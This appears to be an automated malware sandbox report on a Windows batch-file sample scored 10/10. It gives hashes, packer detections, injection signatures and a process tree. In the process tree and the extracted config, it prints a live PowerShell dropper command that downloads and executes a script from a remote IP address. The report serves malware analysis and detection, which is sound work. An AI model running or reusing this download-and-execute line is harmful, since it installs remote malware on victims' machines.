Analysis
-
max time kernel
149s -
max time network
93s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
04-08-2020 09:10
Static task
static1
Behavioral task
behavioral1
Sample
c7537637f0d43130ee366e47192dafee.bat
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
c7537637f0d43130ee366e47192dafee.bat
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
General
-
Target
c7537637f0d43130ee366e47192dafee.bat
-
Size
215B
-
MD5
fbd7beaf39f98a9eb0c56a0e772d389f
-
SHA1
73f16802c6fa6a0c52971bc8d8a04eff13c47a84
-
SHA256
7172e83cc79ad9bc4d5de2683b447c5d68bc807882c369dd2c0c9b04839189d7
-
SHA512
f45895fc63492fa4e179ca664a275a614c2326c04fa85e9438fa5d9095498bc916cba1ee44b47b8148607d974da6cf3821d6022aaa0eff886c445dd1b7ca82d5
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/c7537637f0d43130ee366e47192dafee
Signatures
-
ServiceHost packer 6 IoCs
Detects ServiceHost packer used for .NET malware
Processes:
resource yara_rule behavioral2/memory/908-2-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/908-3-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/908-5-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/908-4-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/908-6-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/908-7-0x0000000000000000-mapping.dmp servicehost -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 584 wrote to memory of 908 584 cmd.exe powershell.exe PID 584 wrote to memory of 908 584 cmd.exe powershell.exe PID 584 wrote to memory of 908 584 cmd.exe powershell.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1128 908 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 1128 WerFault.exe Token: SeBackupPrivilege 1128 WerFault.exe Token: SeDebugPrivilege 1128 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
WerFault.exepid process 1128 WerFault.exe 1128 WerFault.exe 1128 WerFault.exe 1128 WerFault.exe 1128 WerFault.exe 1128 WerFault.exe 1128 WerFault.exe 1128 WerFault.exe 1128 WerFault.exe 1128 WerFault.exe 1128 WerFault.exe 1128 WerFault.exe 1128 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\c7537637f0d43130ee366e47192dafee.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:584 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/c7537637f0d43130ee366e47192dafee');Invoke-HBZVQZJA;Start-Sleep -s 10000"2⤵PID:908
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 908 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1128